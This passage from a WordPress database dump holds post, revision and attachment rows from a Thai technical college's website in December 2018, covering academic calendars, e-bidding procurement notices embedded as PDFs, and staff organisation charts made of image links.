(4797, 3, '2018-12-18 13:36:47', '2018-12-18 06:36:47', '<h4><strong><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/12/ปฏิทินปฏิบัติงาน-2561.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2561<--</a></span></strong></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/06/ปฏิทินปฏิบัติงาน-ประจำปีการศึกษา-2560.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2560<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงานปีการศึกษา-2559.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2559<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปฏิบัติงาน2558.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2558<--</a></span></h4>\r\n<h4><span style=\"color: #008000;\"><a style=\"color: #008000;\" href=\"/wp-content/uploads/2018/03/ปฏิทินปี-57.pdf\">-->ปฏิทินปฏิบัติงาน ประจำปีการศึกษา 2557<--</a></span></h4>', 'ปฏิทินปฏิบัติงาน', '', 'inherit', 'closed', 'closed', '', '1710-revision-v1', '', '', '2018-12-18 13:36:47', '2018-12-18 06:36:47', '', 1710, 'http://www.technicrayong.ac.th/1710-revision-v1/', 0, 'revision', '', 0),
(4800, 3, '2018-12-20 11:22:10', '2018-12-20 04:22:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B9%89%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A5%E0%B8%B7%E0%B9%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์การศึกษาโครงการห้องปฏิบัติการทางภาษาเคลื่อนที่ จำนวน ๖ รายการ ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-6', '', '', '2018-12-20 11:22:10', '2018-12-20 04:22:10', '', 0, 'http://www.technicrayong.ac.th/?p=4800', 204, 'post', '', 0),
(4801, 3, '2018-12-20 11:21:40', '2018-12-20 04:21:40', '', 'ครุภัณฑ์ห้องเรียนปฏิบัติการทางภาษาเคลื่', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%a3%e0%b8%b8%e0%b8%a0%e0%b8%b1%e0%b8%93%e0%b8%91%e0%b9%8c%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1', '', '', '2018-12-20 11:21:40', '2018-12-20 04:21:40', '', 4800, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ครุภัณฑ์ห้องเรียนปฏิบัติการทางภาษาเคลื่.pdf', 0, 'attachment', 'application/pdf', 0),
(4802, 3, '2018-12-20 11:22:10', '2018-12-20 04:22:10', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%AB%E0%B9%89%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%9B%E0%B8%8F%E0%B8%B4%E0%B8%9A%E0%B8%B1%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A5%E0%B8%B7%E0%B9%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์การศึกษาโครงการห้องปฏิบัติการทางภาษาเคลื่อนที่ จำนวน ๖ รายการ ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4800-revision-v1', '', '', '2018-12-20 11:22:10', '2018-12-20 04:22:10', '', 4800, 'http://www.technicrayong.ac.th/4800-revision-v1/', 0, 'revision', '', 0),
(4803, 3, '2018-12-20 11:27:46', '2018-12-20 04:27:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%AA%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-5', '', '', '2018-12-20 11:27:46', '2018-12-20 04:27:46', '', 0, 'http://www.technicrayong.ac.th/?p=4803', 203, 'post', '', 0),
(4804, 3, '2018-12-20 11:26:31', '2018-12-20 04:26:31', '', 'ผู้ชนะการเสนอราคาการประกวดราคา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%aa%e0%b8%99%e0%b8%ad%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3', '', '', '2018-12-20 11:26:31', '2018-12-20 04:26:31', '', 4803, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ผู้ชนะการเสนอราคาการประกวดราคา.pdf', 0, 'attachment', 'application/pdf', 0),
(4805, 3, '2018-12-20 11:27:46', '2018-12-20 04:27:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%AA%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ จำนวน ๑ ชุด โดยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4803-revision-v1', '', '', '2018-12-20 11:27:46', '2018-12-20 04:27:46', '', 4803, 'http://www.technicrayong.ac.th/4803-revision-v1/', 0, 'revision', '', 0),
(4808, 3, '2018-12-20 15:14:41', '2018-12-20 08:14:41', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" />\n\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\"><img class=\"aligncenter size-full wp-image-4809\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\" alt=\"\" width=\"1004\" height=\"669\" /></a>\n\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\"><img class=\"aligncenter size-full wp-image-4810\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\" alt=\"\" width=\"1006\" height=\"330\" /></a>\n\n \n\n ', 'การบัญชี', '', 'inherit', 'closed', 'closed', '', '3235-autosave-v1', '', '', '2018-12-20 15:14:41', '2018-12-20 08:14:41', '', 3235, 'http://www.technicrayong.ac.th/3235-autosave-v1/', 0, 'revision', '', 0),
(4809, 3, '2018-12-20 15:13:37', '2018-12-20 08:13:37', '', '20-12-2561 15-12-37', '', 'inherit', 'closed', 'closed', '', '20-12-2561-15-12-37', '', '', '2018-12-20 15:13:37', '2018-12-20 08:13:37', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/20-12-2561-15-12-37.png', 0, 'attachment', 'image/png', 0),
(4810, 3, '2018-12-20 15:13:44', '2018-12-20 08:13:44', '', '20-12-2561 15-12-57', '', 'inherit', 'closed', 'closed', '', '20-12-2561-15-12-57', '', '', '2018-12-20 15:13:44', '2018-12-20 08:13:44', '', 3235, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/20-12-2561-15-12-57.png', 0, 'attachment', 'image/png', 0),
(4811, 3, '2018-12-20 15:15:05', '2018-12-20 08:15:05', '<img class=\"aligncenter size-full wp-image-3237\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /> <img class=\"aligncenter wp-image-3236\" src=\"/wp-content/uploads/2018/06/27-6-2561-10-59-36-300x80.jpg\" alt=\"\" width=\"379\" height=\"101\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\"><img class=\"aligncenter size-full wp-image-4809\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-37.png\" alt=\"\" width=\"1004\" height=\"669\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\"><img class=\"aligncenter size-full wp-image-4810\" src=\"/wp-content/uploads/2018/12/20-12-2561-15-12-57.png\" alt=\"\" width=\"1006\" height=\"330\" /></a>\r\n\r\n \r\n\r\n ', 'การบัญชี', '', 'inherit', 'closed', 'closed', '', '3235-revision-v1', '', '', '2018-12-20 15:15:05', '2018-12-20 08:15:05', '', 3235, 'http://www.technicrayong.ac.th/3235-revision-v1/', 0, 'revision', '', 0),
(4812, 3, '2018-12-21 09:23:39', '2018-12-21 02:23:39', '', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4792-autosave-v1', '', '', '2018-12-21 09:23:39', '2018-12-21 02:23:39', '', 4792, 'http://www.technicrayong.ac.th/4792-autosave-v1/', 0, 'revision', '', 0),
(4813, 3, '2018-12-21 09:24:10', '2018-12-21 02:24:10', '', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม แก้ไข', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-7', '', '', '2018-12-21 09:24:10', '2018-12-21 02:24:10', '', 4792, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม-แก้ไข.pdf', 0, 'attachment', 'application/pdf', 0),
(4814, 3, '2018-12-21 09:24:24', '2018-12-21 02:24:24', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%9D%E0%B8%B6%E0%B8%81%E0%B8%AB%E0%B8%B8%E0%B9%88%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-%E0%B9%81%E0%B8%81%E0%B9%89%E0%B9%84%E0%B8%82.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'inherit', 'closed', 'closed', '', '4792-revision-v1', '', '', '2018-12-21 09:24:24', '2018-12-21 02:24:24', '', 4792, 'http://www.technicrayong.ac.th/4792-revision-v1/', 0, 'revision', '', 0),
(4815, 3, '2018-12-24 15:20:20', '2018-12-24 08:20:20', '', '7-3-2561 13-11-03', '', 'inherit', 'closed', 'closed', '', '7-3-2561-13-11-03-2', '', '', '2018-12-24 15:20:20', '2018-12-24 08:20:20', '', 1536, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(4816, 3, '2018-12-24 15:20:28', '2018-12-24 08:20:28', '', 'Picture1', '', 'inherit', 'closed', 'closed', '', 'picture1-3', '', '', '2018-12-24 15:20:28', '2018-12-24 08:20:28', '', 1536, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/Picture1-1.png', 0, 'attachment', 'image/png', 0),
(4817, 3, '2018-12-24 15:21:11', '2018-12-24 08:21:11', ' \r\n\r\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" />', 'งานการเงิน', '', 'inherit', 'closed', 'closed', '', '1536-revision-v1', '', '', '2018-12-24 15:21:11', '2018-12-24 08:21:11', '', 1536, 'http://www.technicrayong.ac.th/1536-revision-v1/', 0, 'revision', '', 0),
(4818, 3, '2018-12-24 15:45:54', '2018-12-24 08:45:54', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\n\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\n\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a>\n\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a><a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\n\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\n\n<a href=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\"><img class=\"aligncenter size-full wp-image-4820\" src=\"/wp-content/uploads/2018/12/24-12-2561-15-26-33.png\" alt=\"\" width=\"202\" height=\"249\" /></a>\n\n<a href=\"/wp-content/uploads/2018/12/Picture2.png\"><img class=\"aligncenter wp-image-4821\" src=\"/wp-content/uploads/2018/12/Picture2.png\" alt=\"\" width=\"354\" height=\"103\" /></a>\n\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\n\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\n\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\"><img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" /></a><a href=\"/wp-content/uploads/2018/12/Picture4.png\"><img class=\"aligncenter size-full wp-image-4824\" src=\"/wp-content/uploads/2018/12/Picture4.png\" alt=\"\" width=\"907\" height=\"264\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\n\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\n\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\n\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\n\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\n\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\n\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\n\n \n\n \n\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-autosave-v1', '', '', '2018-12-24 15:45:54', '2018-12-24 08:45:54', '', 1451, 'http://www.technicrayong.ac.th/1451-autosave-v1/', 0, 'revision', '', 0),
(4819, 3, '2018-12-24 15:22:17', '2018-12-24 08:22:17', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\"><img class=\"aligncenter size-full wp-image-4815\" src=\"/wp-content/uploads/2018/12/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a><a href=\"/wp-content/uploads/2018/12/Picture1-1.png\"><img class=\"aligncenter wp-image-4816\" src=\"/wp-content/uploads/2018/12/Picture1-1.png\" alt=\"\" width=\"353\" height=\"103\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\"><img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" /></a><a href=\"/wp-content/uploads/2018/11/Picture1.png\"><img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1.png\" alt=\"\" width=\"386\" height=\"103\" /></a> <a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" 